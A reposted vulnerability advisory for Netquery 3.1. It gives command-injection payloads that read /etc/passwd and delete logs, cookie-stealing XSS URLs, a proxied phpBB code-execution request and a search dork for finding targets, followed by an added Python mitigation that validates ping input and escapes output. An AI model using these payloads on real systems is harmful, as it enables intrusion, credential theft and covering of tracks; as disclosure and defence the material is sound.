
[Repost] Netquery 3.1 Remote Command Execution, Cross-Site Scripting, Information Disclosure Vulnerabilities

Article author: rgod[at]autistici.org

Netquery 3.1 remote command execution, cross-site scripting, information disclosure PoC exploit

software: Netquery 3.1
author site: http://www.virtech.org/tools/

A user can execute commands on the target system through the PING panel, if it is enabled (as it often is), by using the pipe character in the
"Ping IP Address or Host Name" input text box, for example:

| cat /etc/passwd

then you will see the plain-text password file

| pwd

to see the current path

| rm [pwd_output]/logs/nq_log.txt

to delete log file...

disclosure of user activity:
if enabled, a user can view the clear-text log file through the URL:

http://[target]/[path]/logs/nq_log.txt

xss:
http://[target]/[path]/submit.php?portnum="/><script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip2.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip2.php?body=<script>alert(document.cookie)</script>
http://[target]/[path]/nqgeoip.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports2.php?step=<script>alert(document.cookie)</script>
http://[target]/[path]/nqports2.php?body=<script>alert(document.cookie)</script>
http://[target]/[path]/portlist.php?portnum=<script>alert(document.cookie)</script>
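As an added, defender-side illustration (not part of rgod's advisory and not Netquery's own code): the two web-layer bugs above come down to passing an unvalidated form field to a shell and echoing request parameters into HTML unencoded. The Python below is a hypothetical replacement for a ping handler that allow-lists the target as an IP address or RFC 1123 hostname, invokes `ping` as an argv list so no shell ever interprets metacharacters, and HTML-encodes anything reflected back into a page. Netquery itself is written in PHP; the function names and the `ping -c` count flag are assumptions here.

```python
import html
import ipaddress
import re
import subprocess
from typing import List

# Hostname labels per RFC 1123: letters, digits and hyphens only,
# 1-63 characters, no leading or trailing hyphen. A leading hyphen
# is what would let input be parsed as a ping option.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_ping_target(value: str) -> bool:
    """Accept only a literal IP address or a syntactically valid hostname.

    Anything else (shell metacharacters such as '|', ';', '`', '$',
    embedded whitespace, empty input) is rejected before it can reach
    a command line.
    """
    value = value.strip()
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)  # IPv4 or IPv6 literal
        return True
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    return all(_LABEL.match(label) for label in labels)


def build_ping_argv(target: str, count: int = 4) -> List[str]:
    """Build the ping command as an argv list; no shell parses the input.

    Hypothetical helper: the '-c' flag is the Linux/BSD/macOS packet count.
    """
    if not is_valid_ping_target(target):
        raise ValueError("invalid ping target")
    if not 1 <= count <= 10:
        raise ValueError("count out of range")
    return ["ping", "-c", str(count), target.strip()]


def run_ping(target: str) -> str:
    """Run ping without a shell and return its combined output (hypothetical handler)."""
    argv = build_ping_argv(target)
    completed = subprocess.run(
        argv, capture_output=True, text=True, timeout=30, check=False
    )
    return completed.stdout + completed.stderr


def render_param(value: str) -> str:
    """HTML-encode a request parameter (e.g. portnum, step, body) before
    echoing it into the response, so '<script>' and '"' become inert text."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    # Constructed inputs: one benign target and the page's own payloads.
    for candidate in ("127.0.0.1", "example.com", "| cat /etc/passwd", "-c 1000 x"):
        print(f"{candidate!r:28} valid={is_valid_ping_target(candidate)}")
    print(render_param('"/><script>alert(document.cookie)</script>'))
```

Run against the advisory's own payloads, `| cat /etc/passwd` is rejected before any process is started, and the `portnum` payload renders as inert text. The log-disclosure item is a deployment matter rather than code: the application's log directory should sit outside the web root or be denied by the web server.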


A user can use online Netquery installations as proxy servers
to launch exploits from the HTTP GET request panel, for example
exploiting phpBB 2.0.15:
make a GET request to
http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight='.system($HTTP_GET_VARS[command]).'&command=cat%20/etc/passwd

googledork: inurl:nquser.php


rgod
email: rgod[at]autistici.org
site: http://rgod.altervista.org

exp:
http://www.eviloctal.com/forum/read.php?tid=12775
